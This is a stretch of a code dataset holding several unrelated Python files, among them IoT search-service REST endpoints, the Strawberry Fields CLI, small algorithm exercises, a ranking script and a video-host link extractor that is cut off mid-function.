= \"\"):\n \"\"\"\n This utility helps getting iot contents, either from the received request,\n or from the callback url available in the request\n \"\"\"\n callback_url = self.extract_callback_url()\n iot_contents = []\n if callback_url != \"not_callback\":\n \"\"\"\n If the input message is a call back, send a request to \n the callback link to get needed data\n \"\"\"\n \n r = requests.get(callback_url, cookies = {\"wf_id\" : workflow_id})\n \n result = r.json()\n \n iot_content_dicts = result[\"payload\"][\"iot_contents\"]\n else:\n \"\"\"\n Otherwise, extract iot_contents from the request\n \"\"\"\n iot_content_dicts = self.extract_from_payload(\"iot_contents\")\n \n \n for iot_content_dict in iot_content_dicts:\n iot_contents.append(entity.IoTContent(iot_content_dict = iot_content_dict))\n \n return iot_contents\n \n def get_result_set(self, workflow_id = \"\"):\n \"\"\"\n This utility helps getting a result set, either from the received request,\n or from the callback url available in the request\n \"\"\"\n callback_url = self.extract_callback_url()\n result_set = None\n if callback_url != \"not_callback\":\n \"\"\"\n If the input message is a call back, send a request to \n the callback link to get needed data\n \"\"\"\n \n r = requests.get(callback_url, cookies = {\"wf_id\" : workflow_id})\n \n result = r.json()\n \n result_set = result[\"payload\"][\"result_set\"]\n else:\n \"\"\"\n Otherwise, extract iot_contents from the request\n \"\"\"\n result_set = self.extract_from_payload(\"result_set\")\n \n \n return entity.ResultSet(result_set_dict=result_set)\n \n def generate_host_port_endpoint(self, endpoint = None):\n \"\"\"\n This utility remove from endpoint, and create\n a complete URL pointing to a resource from host_port and endpoint\n \n if endpoint is not given, this function returns URL pointing to self\n \"\"\"\n if endpoint is None:\n endpoint = self.rest_endpoint\n endpoint_proc = re.sub(r\"<.*?>\", \"\", endpoint)\n url = \"%s%s\" % (self.self_host_port, endpoint_proc)\n \"\"\"\n Remove trailing /\n \"\"\"\n url = re.sub(r\"\\/$\", \"\", url)\n return url\n \n \n\n#==================================\n# /api/new-cont-ids\n#==================================\nclass NewResIDsPost(AbsResource):\n \"\"\"\n This resource is served by detector services.\n POST request to this resource starts the detection.\n Input: IoT Content entity (directly or via callback)\n Output: Callback message\n \"\"\" \n def post(self):\n \"\"\"\n Get workflow id and inputs\n \"\"\"\n workflow_id = self.extract_workflow_id()\n \n iot_contents = None\n try:\n iot_contents = self.get_iot_contents(workflow_id=workflow_id)\n except:\n \"\"\"\n Do not abort the operation immediately because source detector does not\n need iot-content to work. Therefore, I leave the decision to \n deal with non existence of iot content to the service implementation\n \"\"\"\n print(\"Cannot find the iot content in either the message or at the call back\")\n pass\n \n \"\"\"\n Process and generate outputs\n \"\"\"\n req_id = self.service.detect(iot_contents = iot_contents, wf_id = workflow_id)\n if req_id is None:\n \"\"\"\n If we get a None request from the service, I assume that the client request is incorrect\n \"\"\"\n abort(400)\n req_id = \"%s/%s\" % (self.generate_host_port_endpoint(), req_id)\n msg = message.CallbackMessage(request.url, \"Invoked discovery process. 
Poll the returned URL for results.\", req_id, workflow_id = workflow_id)\n return msg.to_dict(), 201\n\n#==================================\n# /api/new-cont-ids/\n#==================================\nclass NewResIDsGet(AbsResource):\n \"\"\"\n This resource is served by detector services\n GET a list of resource IDs by a given key, which was generated by POST\n Input: N/A\n Output: IoT Content list message\n \"\"\"\n def get(self, req_id):\n \"\"\"\n Get workflow id and input key\n \"\"\"\n workflow_id = self.extract_workflow_id()\n if req_id is None:\n abort(404)\n \n \"\"\"\n Retrieve data and return \n \"\"\"\n res_ids = self.service.get_detect_result(req_id = req_id, wf_id = workflow_id)\n if res_ids is None:\n \"\"\"\n If return from service is None, it means the given req_id is not available on this server\n \"\"\"\n print(\"Resource %s does not exist.\" % req_id)\n abort(404)\n msg = message.IoTContentsMessage(request.url, \"List of detected content id\", res_ids, workflow_id = workflow_id) \n return msg.to_dict()\n\n\n\n\n#==================================\n# /api/res-contents\n#==================================\nclass ResContentsPost(AbsResource):\n \"\"\"\n This resource is served by collector services\n \"\"\"\n def post(self):\n \"\"\"\n Endpoint: /api/res-contents\n \n POST request to this resource invoke the collection process for IoT content\n at the given identifiers. Content is timestamped and store.\n Every new POST request replaces the previous timestamp with a newer one\n \"\"\"\n workflow_id = self.extract_workflow_id()\n\n # Get IoT content either directly from the message, or via call back \n iot_contents = self.get_iot_contents(workflow_id=workflow_id)\n \n req_id = self.service.collect(iot_contents, request.host, wf_id = workflow_id)\n req_id = \"%s/%s\" % (self.generate_host_port_endpoint(), req_id)\n \n msg = message.CallbackMessage(request.url, \"Invoked collection process. Poll the returned URL for results.\", req_id, workflow_id = workflow_id)\n return msg.to_dict() , 201\n\n#==================================\n# /api/res-contents/\n#==================================\nclass ResContentsGet(AbsResource):\n \"\"\"\n This resource is served by collector services\n \"\"\"\n def get(self, req_id):\n workflow_id = self.extract_workflow_id()\n# with open(\"test_cookie.txt\", \"a\") as f:\n# f.write(\"From ResContent: %s\\n\" % workflow_id)\n \n contents = self.service.lookup(req_id, wf_id = workflow_id)\n msg = message.IoTContentsMessage(request.url, \"List of IoT content at the given req_id\", contents, workflow_id = workflow_id)\n return msg.to_dict()\n\n\n\n\n#==================================\n# /api/iot-contents\n#==================================\nclass Contents(AbsResource):\n \"\"\"\n This resource is served by IoT resource storage\n \"\"\"\n def post(self):\n \n workflow_id = self.extract_workflow_id()\n \n # Get IoT content either directly from the message, or via call back \n iot_contents = self.get_iot_contents(workflow_id=workflow_id)\n \n# # Get the url of data to retrieve\n# res_contents_url = self.extract_from_payload(\"res_contents_url\")\n \n # Get content from URl and add to the database\n self.service.insert(iot_contents, wf_id = workflow_id)\n \n url = self.generate_host_port_endpoint()\n msg = message.CallbackMessage(request.url, \"Stored IoT content. 
Poll the returned URL for getting all stored IoT content.\", url, workflow_id = workflow_id)\n \n return msg.to_dict(), 201 \n \n#class Res(AbsResource):\n# \"\"\"\n# This resource is served by IoT resource storage. It represents individual \n# resource item\n# \"\"\"\n# def get(self, res_id):\n# \"\"\"\n# GET request to this resource returns an individual resource item in\n# the storage\n# \"\"\"\n# workflow_id = self.extract_workflow_id()\n## with open(\"test_cookie.txt\", \"a\") as f:\n## f.write(\"From Res: %s\\n\" % workflow_id)\n# \n# return {\"res\" : self.service.getSingleResource(res_id, wf_id = workflow_id)}\n\n\n\n\n#==================================\n# /api/queries\n#==================================\nclass Queries(AbsResource):\n \"\"\"\n Served by a searcher service. It represents the set of all queries handled \n by a searcher service\n \"\"\"\n \n def post(self):\n \"\"\"\n POST request to this resource sends a query and invoke the search process\n It returns URL of the newly created result resource corresponding to the incoming query\n \"\"\"\n workflow_id = self.extract_workflow_id() \n query = self.extract_from_payload(\"query\")\n query = entity.Query(query_dict=query)\n query_id = self.service.query(query, wf_id = workflow_id)\n result_url = \"%s/%s\" % (self.generate_host_port_endpoint(endpoint = rest_endpoints.results), query_id)\n msg = message.CallbackMessage(request.url, \"Finished query. Find the result at the included URL\", result_url, workflow_id = workflow_id)\n return msg.to_dict() , 201\n \n#==================================\n# /api/results\n#==================================\nclass Result(AbsResource):\n \"\"\"\n Served by a searcher service. It represents the set of all results generated\n by a searcher service\n \"\"\"\n def get(self, query_id):\n \"\"\"\n GET request to this resource returns an individual resource item in\n the storage\n \"\"\"\n workflow_id = self.extract_workflow_id()\n result_set = self.service.getResult(query_id, wf_id = workflow_id)\n msg = message.ResultSetMessage(request.url, \"Results\", result_set, workflow_id = workflow_id)\n return msg.to_dict()\n \n\n#==================================\n# /api/results\n#==================================\nclass AggregatorResultsPost(AbsResource):\n \"\"\"\n Served by an aggregator service. It represents the set of all lists of search results\n submitted to the aggregator for aggregation\n \"\"\"\n def post(self):\n \"\"\"\n POST request to this resource sends a result URL and invoke the store process\n It returns URL to /api/results/ to retrieve aggregated results\n \n Expect a message in the format of SearcherPostQueryMessage\n \"\"\"\n workflow_id = self.extract_workflow_id()\n result_set = self.get_result_set(workflow_id=workflow_id)\n query_id = self.service.store(result_set, wf_id = workflow_id)\n aggregated_result_url = \"%s/%s\" % (self.generate_host_port_endpoint(), query_id)\n msg = message.CallbackMessage(request.url, \"Added result URL for the query %s. Find the result at the included URL\" % (workflow_id), aggregated_result_url, workflow_id = workflow_id)\n return msg.to_dict() , 201\n \n#==================================\n# /api/results/\n#==================================\nclass AggregatorResultsGet(AbsResource):\n \"\"\"\n Served by a searcher service. 
#==================================\n# /api/results/<query_id>\n#==================================\nclass AggregatorResultsGet(AbsResource):\n    \"\"\"\n    Served by an aggregator service. It represents the aggregated results\n    generated for each query by the aggregator service\n    \"\"\"\n    def get(self, query_id):\n        \"\"\"\n        GET request to this resource returns an individual resource item in\n        the storage\n        \"\"\"\n        workflow_id = self.extract_workflow_id()\n        result_set = self.service.aggregate(query_id, wf_id = workflow_id)\n        if type(result_set) is not entity.ResultSet:\n            abort(404)\n        msg = message.ResultSetMessage(request.url, \"Aggregated Search Results\", result_set, workflow_id = workflow_id)\n        return msg.to_dict()\n\n\n#==================================\n# /queries\n#==================================\nclass FacadeQueries(AbsResource):\n    \"\"\"\n    Served by a facade service. It provides the entry point to the system for\n    search clients\n    \"\"\"\n    def post(self):\n        \"\"\"\n        POST request to this resource sends a query and invokes the search process.\n        It returns the URL of the newly created result resource corresponding to the incoming query\n        \"\"\"\n        query_content = request.get_json(force=True)\n        query_id, workflow_id = self.service.query(query_content)\n        result_url = \"%s/%s\" % (self.generate_host_port_endpoint(endpoint = rest_endpoints.facade_results_get), query_id)\n        msg = message.CallbackMessage(request.url, \"Finished query. Find the result at the included URL\", result_url, workflow_id = workflow_id)\n\n        return msg.to_dict() , 201\n\n#==================================\n# /results/<query_id>\n#==================================\nclass FacadeResultGet(AbsResource):\n    \"\"\"\n    Served by a facade service. It provides an endpoint for search clients\n    to retrieve the status of their submitted queries\n    \"\"\"\n    def get(self, query_id):\n        \"\"\"\n        GET request to this resource checks the current state of the given query\n        and returns the url of the server holding the result list if it is available\n        \"\"\"\n        workflow_id = self.extract_workflow_id()\n        result_set = self.service.getResult(query_id, wf_id = workflow_id)\n        msg = None\n        if type(result_set) is not entity.ResultSet:\n            result_url = \"%s/%s\" % (self.generate_host_port_endpoint(), query_id)\n            msg = message.CallbackMessage(request.url, \"Result is not available. Please check again later.\", result_url, workflow_id = workflow_id)\n        else:\n            msg = message.ResultSetMessage(request.url, \"Results\", result_set, workflow_id = workflow_id)\n        return msg.to_dict()\n\n#==================================\n# /results\n#==================================\nclass FacadeResultPost(AbsResource):\n    \"\"\"\n    Served by a facade service. 
This endpoint accepts updates from other services\n to update the state of a query under processing\n \"\"\"\n def post(self):\n \"\"\"\n POST request to this resource to update the URL pointing to the result list\n of a processing query\n \"\"\"\n workflow_id = self.extract_workflow_id()\n result_set = self.get_result_set(workflow_id=workflow_id)\n query_id = result_set.query_ID\n self.service.updateResult(query_id, result_set)\n result_url = \"%s/%s\" % (self.generate_host_port_endpoint(), query_id)\n msg = message.CallbackMessage(request.url, \"Updated results of query %s\" % query_id, result_url, workflow_id = workflow_id)\n return msg.to_dict(), 201","sub_path":"component_services/metadata_collector_service/ISEPLib/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":18194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"164534591","text":"__author__ = 'David'\r\n\r\nclass Node:\r\n def __init__(self, item = None, link = None): # set default values = None\r\n self.item = item\r\n self.next = link\r\n\r\n # print node, must return a string\r\n def __str__(self):\r\n return str(self.item)\r\n\r\n def print_structure(self,node):\r\n while node is not None:\r\n print(node, end =\" \")\r\n node = node.next\r\n print()\r\n\r\nif __name__ == \"__main__\":\r\n '''\r\n need to have nodes from end to start\r\n end: n1\r\n stuff: n2 | links to n1\r\n stuff: n3 | links to n2\r\n start: n4 | links to n3\r\n due to links n3 has to be defined before n4 for n4 to link to n3\r\n '''\r\n\r\n n1 = Node(\"structure\")\r\n n5 = Node(\"a linked\", n1)\r\n n2 = Node(\"is\", n5)\r\n n3 = Node(\"this\", n2)\r\n n4 = Node(\"Hello\", n3)\r\n\r\n # prints all \"Hello this is a linked structure\"\r\n n1.print_structure(n4)\r\n # prints hello\r\n print(n4)\r\n # prints a linked\r\n print(n5)","sub_path":"FIT1008-Intro-To-Computer-Science/Pracs/26029391_Prac8/Class_node.py","file_name":"Class_node.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"596472930","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n@author: samyf\n\"\"\"\nimport numpy as np\nfrom scipy import linalg\nimport math\n\ndef matrizFunciones(x,y):\n f1=-x**2-y**2+1\n f2=y-x\n return np.array([f1,f2])\n \ndef Jacobiano(x,y):\n return np.array([[2*x, 2*y],[-1 , 1]])\n\n\n\nx=1 #valor inicial de x\ny=1 #valor inicial de y \ntolerancia=10**-8\nn=10 #numero de iteraciones que se deben hacer \nk=0\nsolucionAnterior=[x,y]\ndispercion=1\n\nwhile k < n or dispercion > tolerancia:\n \n print(\"iteracion \",k,\":\", solucionAnterior)\n J=Jacobiano(solucionAnterior[0], solucionAnterior[1])\n b=matrizFunciones(solucionAnterior[0], solucionAnterior[1])\n\n\n solucion= linalg.solve(J, b)\n\n solucionActual=solucionAnterior[0] +solucion[0],solucionAnterior[1] +solucion[1] \n solucionAnterior=solucionActual\n \n k=k+1\n dispercion= abs(math.sqrt((solucionActual[0]-solucionAnterior[0])**2 + (solucionActual[1]-solucionAnterior[1])**2 ))\n \n\n\nprint(\"iteracion \",k,\":\", solucionAnterior)\n\n\n\n","sub_path":"Talleres/Taller 2/SPOILER_implementacion_metodo_newton_multivariado.py","file_name":"SPOILER_implementacion_metodo_newton_multivariado.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"448464025","text":"# Copyright 2019-2020 Xanadu Quantum Technologies Inc.\n\n# Licensed under the Apache 
License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"A standalone command-line interface for configuring Strawberry Fields and connecting\nto the Xanadu cloud platform.\n\"\"\"\n\nimport argparse\nimport sys\n\nfrom strawberryfields.api import Connection\nfrom strawberryfields.configuration import ConfigurationError, create_config, store_account\nfrom strawberryfields.engine import RemoteEngine\nfrom strawberryfields.io import load\n\n\ndef main():\n \"\"\"The Xanadu cloud platform command line interface.\n\n **Example:**\n\n The following is a simple example on getting the help message of the cloud platform command\n line interface. It details each of the options available.\n\n .. code-block:: console\n\n $ sf\n usage: sf [-h] [--ping] {configure,run} ...\n\n See below for available options and commands for working with the Xanadu cloud platform.\n\n General Options:\n -h, --help show this help message and exit\n --ping, -p Tests the connection to the remote backend.\n\n Commands:\n {configure,run}\n configure Configure each detail of the API connection.\n run Run a blackbird script.\n \"\"\"\n parser = create_parser()\n args = parser.parse_args()\n\n if args.ping:\n ping()\n elif hasattr(args, \"func\"):\n args.func(args)\n else:\n parser.print_help()\n\n\ndef create_parser():\n \"\"\"Creates a parser to process the commands and arguments passed to the\n command line interface.\n\n Returns:\n ArgumentParser: an argument parser object that defines the related\n options\n \"\"\"\n parser = argparse.ArgumentParser(\n description=\"See below for available options and commands for working with the Xanadu cloud platform.\"\n )\n\n # Setting a title for the general options (requires setting a private\n # attribute)\n parser._optionals.title = \"General Options\"\n\n # Adding the pinging general option\n parser.add_argument(\n \"--ping\", \"-p\", action=\"store_true\", help=\"Tests the connection to the remote backend.\"\n )\n\n # Adding subparsers configure and input\n subparsers = parser.add_subparsers(title=\"Commands\")\n\n # Adding the configure subparser\n configure_parser = subparsers.add_parser(\n \"configure\", help=\"Configure each detail of the API connection.\"\n )\n configure_parser.set_defaults(func=configure)\n\n configure_parser.add_argument(\n \"--token\",\n \"-t\",\n type=str,\n help=\"Configure Strawberry Fields with your Xanadu cloud platform API token.\",\n )\n configure_parser.add_argument(\n \"--local\",\n \"-l\",\n action=\"store_true\",\n help=\"Create a local configuration file in the current directory.\",\n )\n\n # Adding the input subparser\n run_parser = subparsers.add_parser(\"run\", help=\"Run a blackbird script.\")\n run_parser.add_argument(\n \"input\", type=str, help=\"The filename or path to the blackbird script to run.\"\n )\n run_parser.set_defaults(func=run_blackbird_script)\n run_parser.add_argument(\n \"--output\",\n \"-o\",\n help=\"Path to the output file, where the results of the program will be written (stdout by default).\",\n )\n\n return parser\n\n\ndef configure(args):\n 
r\"\"\"An auxiliary function for configuring the API connection to the Xanadu\n cloud platform.\n\n Can be used to simply save the authentication token with default\n configuration options. Alternatively, a wizard is provided for full\n configurability.\n\n See more details regarding Strawberry Fields configuration and available\n configuration options on the :doc:`/code/sf_configuration` page.\n\n Args:\n args (ArgumentParser): arguments that were specified on the command\n line stored as attributes in an argument parser object\n \"\"\"\n if args.token:\n kwargs = {\"authentication_token\": args.token}\n else:\n kwargs = configuration_wizard()\n\n if args.local:\n store_account(**kwargs, location=\"local\")\n else:\n store_account(**kwargs)\n\n\ndef ping():\n \"\"\"Tests the connection to the remote backend.\"\"\"\n if Connection().ping():\n sys.stdout.write(\"You have successfully authenticated to the platform!\\n\")\n else:\n sys.stdout.write(\"There was a problem when authenticating to the platform!\\n\")\n\n\ndef configuration_wizard():\n r\"\"\"Provides an interactive selection wizard on the command line to\n configure every option for the API connection.\n\n Default configuration options are provided as defaults to the user.\n Configuration options are detailed in :doc:`/code/sf_configuration`.\n\n Returns:\n dict[str, Union[str, bool, int]]: the configuration options\n \"\"\"\n default_config = create_config()[\"api\"]\n\n # Getting default values that can be used for as messages when getting inputs\n hostname_default = default_config[\"hostname\"]\n ssl_default = \"y\" if default_config[\"use_ssl\"] else \"n\"\n port_default = default_config[\"port\"]\n\n authentication_token = input(\n \"Please enter the authentication token to use when connecting: [] \"\n )\n\n if not authentication_token:\n sys.stdout.write(\"No authentication token was provided, please configure again.\")\n sys.exit()\n\n hostname = (\n input(\n \"Please enter the hostname of the server to connect to: [{}] \".format(hostname_default)\n )\n or hostname_default\n )\n\n ssl_input = (\n input(\"Should the client attempt to connect over SSL? [{}] \".format(ssl_default))\n or ssl_default\n )\n use_ssl = ssl_input.upper() == \"Y\"\n\n port = (\n input(\"Please enter the port number to connect with: [{}] \".format(port_default))\n or port_default\n )\n\n kwargs = {\n \"authentication_token\": authentication_token,\n \"hostname\": hostname,\n \"use_ssl\": use_ssl,\n \"port\": port,\n }\n return kwargs\n\n\ndef run_blackbird_script(args):\n \"\"\"Run a blackbird script.\n\n Related arguments:\n * input: the input blackbird script to be run\n * output: the output file to store the results in (optional)\n\n Args:\n args (ArgumentParser): arguments that were specified on the command\n line stored as attributes in an argument parser object\n \"\"\"\n try:\n program = load(args.input)\n except FileNotFoundError:\n sys.stdout.write(\"The {} blackbird script was not found.\".format(args.input))\n sys.exit()\n\n eng = RemoteEngine(program.target)\n\n sys.stdout.write(\"Executing program on remote hardware...\\n\")\n result = eng.run(program)\n\n if result and result.samples is not None:\n write_script_results(result.samples, output_file=args.output)\n else:\n sys.stdout.write(\n \"Ooops! Something went wrong with obtaining the results. 
Please check the Blackbird script specified and the connection to the remote engine.\"\n )\n sys.exit()\n\n\ndef write_script_results(samples, output_file=None):\n \"\"\"Write the results of the script either to a file or to the standard output.\n\n Args:\n samples (array[float]): array of samples\n output_file (str or None): the path to the output file, None if no output was defined\n \"\"\"\n if output_file:\n with open(output_file, \"w\") as file:\n file.write(str(samples))\n else:\n sys.stdout.write(str(samples))\n","sub_path":"strawberryfields/cli/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"353883412","text":"#\n# [966] Binary Subarrays With Sum\n#\n# https://leetcode.com/problems/binary-subarrays-with-sum/description/\n#\n# algorithms\n# Medium (25.28%)\n# Total Accepted: 1.4K\n# Total Submissions: 5.5K\n# Testcase Example: '[1,0,1,0,1]\\n2'\n#\n# In an array A of 0s and 1s, how many non-empty subarrays have sum S?\n#\n#\n#\n# Example 1:\n#\n#\n# Input: A = [1,0,1,0,1], S = 2\n# Output: 4\n# Explanation:\n# The 4 subarrays are bolded below:\n# [1,0,1,0,1]\n# [1,0,1,0,1]\n# [1,0,1,0,1]\n# [1,0,1,0,1]\n#\n#\n#\n#\n# Note:\n#\n#\n# A.length <= 30000\n# 0 <= S <= A.length\n# A[i] is either 0 or 1.\n#\n#\n#\n\n\nclass Solution:\n def numSubarraysWithSum(self, A, S):\n \"\"\"\n :type A: List[int]\n :type S: int\n :rtype: int\n \"\"\"\n if not A:\n return 0\n # count each sum, and cal the final res\n cursum = 0\n d = {}\n for a in A:\n cursum += a\n if cursum not in d:\n d[cursum] = 0\n d[cursum] += 1\n res = 0\n # NOTE: if S == 0, then need to find the continous 0 count n (d[0] or d[i]-1) and res+=n*(n+1)//2\n if S == 0:\n for k in d:\n if k == 0:\n zeros = d[k]\n else:\n zeros = d[k] - 1\n res += zeros*(zeros+1)//2\n else:\n for k in d:\n if k == S:\n res += d[k]\n if k + S in d:\n # NOTE: here is d[k] * d[k + S], instead of d[k+1] * d[k + S], because the start index sub array is from [ki+1, (k+1)i]\n res += d[k] * d[k + S]\n return res\n\n\ndef main():\n print(Solution().numSubarraysWithSum([0, 0, 0, 0, 0], 0))\n print(Solution().numSubarraysWithSum([1, 1, 0, 1], 2))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Medium/930.binary-subarrays-with-sum.python3.py","file_name":"930.binary-subarrays-with-sum.python3.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"341575346","text":"import os\nimport csv\nfrom decimal import Decimal\npath = '/Users/ronald/Desktop/'\ndef main():\n for file in os.listdir(path):\n if 'case3' in file:\n with open('/Users/ronald/Desktop/' + file, 'r') as fil:\n f_reader = csv.reader(fil)\n # print(type(f_reader))\n data = [row for row in f_reader]\n # print(data)\n # for data1 in data:\n for i in range(1,len(data)):\n data[i][1] = float(data[i][1])\n data2 = [data.pop(0)]\n data1 = sorted(data,key = lambda s: s[1],reverse=True)\n data2.extend(data1)\n # print(data2)\n # a=[]\n b = []\n for i in range(len(data2)):\n # print(data[i][2])\n if '产品经理-顺丰-不合适' in data2[i][2] or '产品经理-顺丰-合适' in data2[i][2]:\n # print('1')\n # print(data2[i][2])\n b.append(data2[i])\n # print(b)\n c = []\n for i in range(len(data2)):\n # print(data[i][2])\n if '产品经理-顺丰-一般合适' in data2[i][2] or '产品经理-顺丰-非常合适' in data2[i][2]:\n # print('1')\n # print(data2[i][2])\n c.append(data2[i])\n # print(c)\n d = []\n for i in range(len(data2)):\n # 
print(data[i][2])\n if '产品经理-顺丰-一般合适' in data2[i][2] or '产品经理-顺丰-非常合适' in data2[i][2] or '产品经理-顺丰-不合适' in data2[i][2] or '产品经理-顺丰-合适' in data2[i][2]:\n # print('1')\n # print(data2[i][2])\n d.append(data2[i])\n # print(c)\n # d = b + c\n # print(d)\n return b,data2,c,d\n\ndef top(n):\n j=0\n # c = []\n for i in range(n):\n if '产品经理-顺丰-合适' in b[i][2]:\n # c.append(b[i])\n j+=1\n return str(j)\ndef top1(n):\n j=0\n # c = []\n for i in range(n):\n if '产品经理-顺丰-非常合适' in c[i][2]:\n # c.append(b[i])\n j+=1\n return str(j)\ndef top2(n):\n j = 0\n for i in range(n + 1):\n if '产品经理-顺丰-合适' in data2[i][2] or '产品经理-顺丰-非常合适' in data2[i][2]:\n j += 1\n return str(j)\ndef top3(n):\n j = 0\n for i in range(n):\n # print(d[i][2])\n if '产品经理-顺丰-合适' in d[i][2] or '产品经理-顺丰-非常合适' in d[i][2]:\n # print(d[i][2])\n j += 1\n return str(j)\nif __name__ == '__main__':\n b,data2,c,d = main()\n\n f = open('/Users/ronald/Desktop/chanpin.txt', 'a')\n # j = top(n)\n f.write('pure'+'\\n')\n # f.write(j+'\\n')\n for i in range(len(b)):\n b[i][1] = str(b[i][1])\n\n for i in range(len(b)):\n f.write(' '.join(b[i])+'\\n')\n f.write('合适占合适与不合适比例' + '\\n')\n j = top(3)\n # print(j)\n f.write('top3'+' = ' + str(Decimal(int(j)/3).quantize(Decimal('0.00')))+'\\n')\n j = top(5)\n # print(j)\n f.write('top5' + ' = ' + str(Decimal(int(j)/5).quantize(Decimal('0.00')))+'\\n')\n j = top(10)\n f.write('top10' + ' = ' + str(Decimal(int(j)/10).quantize(Decimal('0.00')))+'\\n')\n if len(b) > 15:\n j = top(15)\n f.write('top15' + ' = ' + str(Decimal(int(j)/15).quantize(Decimal('0.00')))+'\\n')\n if len(b) > 25:\n j = top(25)\n f.write('top25' + ' = ' + str(Decimal(int(j)/25).quantize(Decimal('0.00')))+'\\n')\n f.write('非常合适占非常合适与一般合适比例' + '\\n')\n if len(c) > 3:\n j = top1(3)\n f.write('top3' + ' = ' + str(Decimal(int(j) / 3).quantize(Decimal('0.00'))) + '\\n')\n if len(c) > 5:\n j = top1(5)\n f.write('top5' + ' = ' + str(Decimal(int(j) / 5).quantize(Decimal('0.00'))) + '\\n')\n if len(c) > 10:\n j = top1(10)\n f.write('top10' + ' = ' + str(Decimal(int(j) / 10).quantize(Decimal('0.00'))) + '\\n')\n if len(c) > 15:\n j = top1(15)\n f.write('top15' + ' = ' + str(Decimal(int(j) / 15).quantize(Decimal('0.00'))) + '\\n')\n if len(c) > 25:\n j = top1(25)\n f.write('top25' + ' = ' + str(Decimal(int(j) / 25).quantize(Decimal('0.00'))) + '\\n')\n f.write('非常合适和合适占全部产品经理比例' + '\\n')\n j = top3(3)\n f.write('top3' + ' = ' + str(Decimal(int(j) / 3).quantize(Decimal('0.00'))) + '\\n')\n j = top3(5)\n f.write('top5' + ' = ' + str(Decimal(int(j) / 5).quantize(Decimal('0.00'))) + '\\n')\n if len(d) > 10:\n j = top3(10)\n f.write('top10' + ' = ' + str(Decimal(int(j) / 10).quantize(Decimal('0.00'))) + '\\n')\n if len(d) > 15:\n j = top3(15)\n f.write('top15' + ' = ' + str(Decimal(int(j) / 15).quantize(Decimal('0.00'))) + '\\n')\n if len(d) > 25:\n j = top3(25)\n f.write('top25' + ' = ' + str(Decimal(int(j) / 25).quantize(Decimal('0.00'))) + '\\n')\n f.write('mix'+'\\n')\n for i in range(len(data2)):\n data2[i][1] = str(data2[i][1])\n for i in range(len(data2)):\n f.write(' '.join(data2[i])+'\\n')\n j = top2(3)\n f.write('top3' + ' = ' + str(Decimal(int(j)/3).quantize(Decimal('0.00'))) + '\\n')\n j = top2(5)\n f.write('top5' + ' = ' + str(Decimal(int(j)/5).quantize(Decimal('0.00'))) + '\\n')\n j = top2(10)\n f.write('top10' + ' = ' + str(Decimal(int(j)/10).quantize(Decimal('0.00'))) + '\\n')\n if len(data2) > 15:\n j = top2(15)\n f.write('top15' + ' = ' + str(Decimal(int(j)/15).quantize(Decimal('0.00'))) + '\\n')\n if len(data2) > 25:\n j = top2(25)\n 
f.write('top25' + ' = ' + str(Decimal(int(j)/25).quantize(Decimal('0.00'))) + '\\n')\n if len(data2) > 50:\n j = top2(50)\n f.write('top50' + ' = ' + str(Decimal(int(j)/25).quantize(Decimal('0.00'))) + '\\n')\n\n\n\n\n\n","sub_path":"Ranking_1/paixu/case/chanpin.py","file_name":"chanpin.py","file_ext":"py","file_size_in_byte":5675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"312441380","text":"import re\nimport execjs\nimport cfscrape\nimport subprocess\nfrom pyquery import PyQuery as pq\nfrom .utils import exceptions, casper, scrapertools\n\nscraper = cfscrape.create_scraper()\n\nclass streamango_IE:\n def __init__(self):\n self.regexes = [r\"^(?:https?://)?(?:www\\.)?(streamango\\.[a-z]+)\\/(?:f|embed)\\/([A-Za-z0-9]{10,})\"]\n self.aggregate = False\n \n def rewrite(self, url, find):\n for r in self.regexes:\n obj = re.match(r, url)\n if obj:\n return \"%s/f/%s\" % (find.best(obj.group(1)), obj.group(2))\n \n raise exceptions.RewriteError()\n \n \n def supports(self, url):\n for r in self.regexes:\n if re.match(r, url):\n return True\n \n return False\n \n \n def get(self, url, headers, bestOnly=True):\n \n data = scraper.get(url, headers=headers).content.decode('utf-8')\n \n video_urls = []\n \n matches = scrapertools.find_multiple_matches(\n data,\n \"type:\\\"video/([^\\\"]+)\\\",src:d\\('([^']+)',(.*?)\\).+?height:(\\d+)\")\n \n for ext, encoded, code, quality in matches:\n media_url = self.decode(encoded, int(code))\n \n while media_url[-1] == '@':\n media_url = media_url[:-1]\n \n if not media_url.startswith(\"http\"):\n media_url = \"http:\" + media_url\n video_urls.append(media_url)\n \n if bestOnly:\n return [video_urls[0]]\n else:\n return video_urls\n\n\n def decode(self, encoded, code):\n \n _0x59b81a = \"\"\n k = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='\n k = k[::-1]\n \n count = 0\n while count < len(encoded):\n _0x4a2f3a = k.index(encoded[count])\n count += 1\n _0x29d5bf = k.index(encoded[count])\n count += 1\n _0x3b6833 = k.index(encoded[count])\n count += 1\n _0x426d70 = k.index(encoded[count])\n count += 1\n \n _0x2e4782 = ((_0x4a2f3a << 2) | (_0x29d5bf >> 4))\n _0x2c0540 = (((_0x29d5bf & 15) << 4) | (_0x3b6833 >> 2))\n _0x5a46ef = ((_0x3b6833 & 3) << 6) | _0x426d70\n _0x2e4782 = _0x2e4782 ^ code\n \n _0x59b81a = str(_0x59b81a) + chr(_0x2e4782)\n \n if _0x3b6833 != 